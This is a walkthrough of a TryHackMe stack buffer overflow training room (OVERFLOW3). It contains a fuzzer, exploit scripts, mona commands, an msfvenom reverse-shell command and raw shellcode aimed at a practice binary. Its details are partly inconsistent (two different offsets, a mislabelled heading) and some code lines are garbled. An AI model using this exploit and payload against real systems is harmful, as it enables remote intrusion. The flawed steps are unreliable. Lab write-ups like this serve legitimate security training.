TryHackMe: OSCP Buffer Overflow Prep (OVERFLOW 3)
By Shamsher khan Practice Stack Based Buffer Overflows! for OSCP
Room link: https://www.tryhackme.com/room/bufferoverflowprep
Note: This room is Free
Before you go through this writeup ensure you have been complete
Buffer Overflow Prep (OVERFLOW-1)
Buffer Overflow Prep (OVERFLOW-2)
Definitions:
- EIP =>The Extended Instruction Pointer (EIP) is a register that contains the address of the next instruction for the program or command.
- ESP=>The Extended Stack Pointer (ESP) is a register that lets you know where on the stack you are and allows you to push data in and out of the application.
- JMP =>The Jump (JMP) is an instruction that modifies the flow of execution where the operand you designate will contain the address being jumped to.
- \x41, \x42, \x43 =>The hexadecimal values for A, B and C. For this exercise, there is no benefit to using hex vs ascii, it’s just my personal preference.
OVERFLOW #2
Okay, right now we should run our Immunity Debugger as Administrator and open the oscp.exe.
The application will be loaded into the debugger in the “Paused” state. click Red play button on the upper bar OR F9 within Immunity Debugger.
Ensure the exe is running by checking the status in the lower right of Immunity Debugger.
To check we can NC to target machine with port 1337.
Here i am choosing OVERFLOW3 Parameter
Set the working folder within mona.
Download mona.py and paset into C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands
!mona config -set workingfolder c:\mona\%p
Let’s try to run fuzzer.py (get from the room) and see the results. Just check whether the IP inside the script is correct and make sure to run again the oscp.exe in Immunity Debugger before running the script.
Note:- change the Command OVERFLOW2 to OVERFLOW3 in fuzzer.py and exploit.py
Fuzzer.py
import socket, time, sysip = "192.168.43.57";
port = 1337
timeout = 5buffer = []
counter = 100
while len(buffer) < 30:
buffer.append("A" * counter)
counter += 100for string in buffer:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
connect = s.connect((ip, port))
s.recv(1024)
print("Fuzzing with %s bytes" % len(string))
s.send("OVERFLOW3 " + string + "\r\n")
s.recv(1024)
s.close()
except:
print("Could not connect to " + ip + ":" + str(port))
sys.exit(0)
time.sleep(1)Also copy the exploit.py code
import socketip = "192.168.43.57"
port = 1337prefix = "OVERFLOW3 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""buffer = prefix + overflow + retn + padding + payload + postfixs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
Click on Red play button , and Kick off the fuzzer.py against the target IP
If you can see it stop at 1300 bytes which means the offset would be in the range of 1200 to 1300 bytes. Let’s create a pattern more than our offset around 100 bytes which would be 1400 bytes.
Above image you can see that EIP has been overwritten with 41414141 (AAAA). So we need to find the exact address where the program is crashed
Now generate a pattern, based on the length of bytes to crash the server.
msf-pattern_create -l 1400
So copy the payload and put it into the payload variable in exploit.py and try to run it. The script should crash the oscp.exe server again.
CTRL+F2 = Reload OSCP.exe
F9 = Run Server
Ensure oscp.exe is running within Immunity Debugger. Execute exploit.py against the target.
in the above image We have EIP=35714234
EIP is overwritten by an offset that we generated.
Find Offset Value
offset value is 1274
Another Method to find Offset value using mona module
Try running the following mona command in immunity:
!mona findmsp -distance 1600
So look for the line said EIP contains normal pattern :0x76413176 (offset 634). the offset we found in the offset variable and set the retn variable to BBBB.
Update the offset and the retn variable
Restart the .exe in Immunity Debugger with Ctrl+F12 and F9 to run. Execute the exploit.py. If the offset is correct we should see “42424242” <- the B’s at the EIP.
Let’s run it again.
As we can see the EIP Register is Overwritten with BBBB or 42424242. So far everything went well.
Take note of the ESP address because we will be using the values in this position in future step
Find Badchars
Now we need to find the BADCHARS- For which we create BADCHARS, on set inside the machine using MONA and another by just googling or using a python script.By default \x00 is considered as a BADCHAR so it is to be neglected for sure. This helps us to identify the characters which are really BAD for our program!
Generate a bytearray using mona, and exclude the null byte (\x00) by default.
Use this mona commands.
!mona bytearray -b "\x00"
Now we need to generate a string of bad chars from \x01 to \xff that is identical to the bytearray. Use the python script
bytegen.py
for x in range(1, 256):
print("\\x" + "{:02x}".format(x), end='')
print()
This generated string has already removed the \x00 so we need to remove that from the .bin with mona.
Copy the new generated string into the payload variable in the exploit.py
Run the script and take note of the address to which the ESP register points
Right click on ESP Value and Follow in dump
in the above image the sequence has been changed between 10 or 13 that means there are some badchar in over payload lets find out badchars
Use it in the following mona command
Note:- Maybe your ESP address is diffrent
!mona compare -f C:\mona\oscp\bytearray.bin -a 00D0FA28
Possible bad chars
So we found a list of possible bad chars 11 12 40 41 5f 60 b8 b9 ee ef
Not all of these might be bad chars! Sometimes bad chars cause the next byte to get corrupted as well, or even affect the rest of the string.
At this point I start removing the bad characters one at a time. I removed one bad character at a time by repeating the following steps:
- Remove character from byte array
- Remove character from exploit payload
- Start exe
- Compare using mona
Start oscp.exe in immunity,
So i created a new bytearray and removed \x11 from the payload too
!mona bytearray -b "\x00\x11"
run server
Edit exploit.py remove \x11 from payload variable and run exploit.py
check ESP Pointer value
!mona compare -f C:\mona\oscp\bytearray.bin -a 00D5FA28(ESP)
As a hint by the immunity debugger the possible BADCHARS now were x40 \x41\x5f \x60\xb8\xb9\xee\xef. That means a BADCHAR made its adjacent byte too a BADCHAR which want BAD by default
start oscp.exe in immunity
So i created a new bytearray and removed \x40 from the payload too
!mona bytearray -b "\x00\x11\x40"run server
Edit exploit.py remove \x40 from payload variable and run exploit.py
check ESP Pointer value
!mona compare -f C:\mona\oscp\bytearray.bin -a 0088FA28
and again it was the same case x40 was a BADCHAR was x41 wasn’t one.
Now we had only two apparent BADCHARS \x5f \x60\xb8\xb9\xee\xef
start oscp.exe in immunity
So i created a new bytearray and removed \x5f from the payload too
!mona bytearray -b "\x00\x11\x40\x5f"run server
Edit exploit.py remove \x5f from payload variable and run exploit.py
check ESP Pointer value
!mona compare -f C:\mona\oscp\bytearray.bin -a 00BDFA28
and again it was the same case x5f was a BADCHAR was x60 wasn’t one.
Now we had only two apparent BADCHARS \xb8\xb9\xee\xef
start oscp.exe in immunity
So i created a new bytearray and removed \xb8 from the payload too
!mona bytearray -b "\x00\x11\x40\x5f\xb8"run server
Edit exploit.py remove \xb8 from payload variable and run exploit.py
check ESP Pointer value
!mona compare -f C:\mona\oscp\bytearray.bin -a 008DFA28
and again it was the same case xb8 was a BADCHAR was xb9 wasn’t one.
Now we had only two apparent BADCHARS \xee\xef
start oscp.exe in immunity
So i created a new bytearray and removed \xee from the payload too
!mona bytearray -b "\x00\x11\x40\x5f\xb8\xee"run server
Edit exploit.py remove \xee from payload variable and run exploit.py
check ESP Pointer value
!mona compare -f C:\mona\oscp\bytearray.bin -a 0085FA28
After this! WE FIRE IT and run the comparison in MONA, we find the address unmodified now. BOOM so finally we got our BADCHARS
got error unmodified, And after try and error, the sequence is like this.
Green Box means correct bad chars, Let’s find the jump point using the mona command again:
!mona jmp -r esp -cpb “\x00\x11\x40\x5f\xb8\xee”
Any of the addresses from the results above may be used as the retn value in the exploit. Little endian = Reverse. Also add padding to allow the payload to unpack.
Note the address 62501203
Note:- If 62501203 not create perfect paylaod for for reverse shell then change address untill you got reverse shell
Update our retn variable with the new address and must be written backward (since the system is little-endian=Reverse).
retn = "\x03\x12\x50\x62"
padding = "\x90" * 16
Now generate the reverse shell payload using msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.43.73 LPORT=4444 EXITFUNC=thread -b “\x00\x11\x40\x5f\xb8\xee” -f c
Copy the payload into the exploit.py and set the payload variable equal to buf.
so the final payload is this for My Kali
import socketip = "192.168.43.57"
port = 1337
buf = b""
buf += b"\xfc\xbb\xc3\x62\xa9\xe4\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3"
buf += b"\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3f\x8a\x2b\xe4\xbf"
buf += b"\x4b\x4c\x6c\x5a\x7a\x4c\x0a\x2f\x2d\x7c\x58\x7d\xc2\xf7\x0c"
buf += b"\x95\x51\x75\x99\x9a\xd2\x30\xff\x95\xe3\x69\xc3\xb4\x67\x70"
buf += b"\x10\x16\x59\xbb\x65\x57\x9e\xa6\x84\x05\x77\xac\x3b\xb9\xfc"
buf += b"\xf8\x87\x32\x4e\xec\x8f\xa7\x07\x0f\xa1\x76\x13\x56\x61\x79"
buf += b"\xf0\xe2\x28\x61\x15\xce\xe3\x1a\xed\xa4\xf5\xca\x3f\x44\x59"
buf += b"\x33\xf0\xb7\xa3\x74\x37\x28\xd6\x8c\x4b\xd5\xe1\x4b\x31\x01"
buf += b"\x67\x4f\x91\xc2\xdf\xab\x23\x06\xb9\x38\x2f\xe3\xcd\x66\x2c"
buf += b"\xf2\x02\x1d\x48\x7f\xa5\xf1\xd8\x3b\x82\xd5\x81\x98\xab\x4c"
buf += b"\x6c\x4e\xd3\x8e\xcf\x2f\x71\xc5\xe2\x24\x08\x84\x6a\x88\x21"
buf += b"\x36\x6b\x86\x32\x45\x59\x09\xe9\xc1\xd1\xc2\x37\x16\x15\xf9"
buf += b"\x80\x88\xe8\x02\xf1\x81\x2e\x56\xa1\xb9\x87\xd7\x2a\x39\x27"
buf += b"\x02\xfc\x69\x87\xfd\xbd\xd9\x67\xae\x55\x33\x68\x91\x46\x3c"
buf += b"\xa2\xba\xed\xc7\x25\x05\x59\xec\xfc\xed\x98\xf2\xef\xb1\x15"
buf += b"\x14\x65\x5a\x70\x8f\x12\xc3\xd9\x5b\x82\x0c\xf4\x26\x84\x87"
buf += b"\xfb\xd7\x4b\x60\x71\xcb\x3c\x80\xcc\xb1\xeb\x9f\xfa\xdd\x70"
buf += b"\x0d\x61\x1d\xfe\x2e\x3e\x4a\x57\x80\x37\x1e\x45\xbb\xe1\x3c"
buf += b"\x94\x5d\xc9\x84\x43\x9e\xd4\x05\x01\x9a\xf2\x15\xdf\x23\xbf"
buf += b"\x41\x8f\x75\x69\x3f\x69\x2c\xdb\xe9\x23\x83\xb5\x7d\xb5\xef"
buf += b"\x05\xfb\xba\x25\xf0\xe3\x0b\x90\x45\x1c\xa3\x74\x42\x65\xd9"
buf += b"\xe4\xad\xbc\x59\x04\x4c\x14\x94\xad\xc9\xfd\x15\xb0\xe9\x28"
buf += b"\x59\xcd\x69\xd8\x22\x2a\x71\xa9\x27\x76\x35\x42\x5a\xe7\xd0"
buf += b"\x64\xc9\x08\xf1\x64\xed\xf6\xfa"
prefix = "OVERFLOW3 "
offset = 1274
overflow = "A" * offset
retn = "\x03\x12\x50\x62"
padding = "\x90" * 16
payload = bufpostfix = ""buffer = prefix + overflow + retn + padding + payload + postfixs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(buffer + "\r\n")
print("Done!")
except:
print("Could not connect.")
Start up a listener with netcat
Start the vulnerable application again. Execute exploit.py. Now looking back at netcat.
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Before you go…
Click Here To Join Telegram
https://t.me/tryhackme_writeups
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!
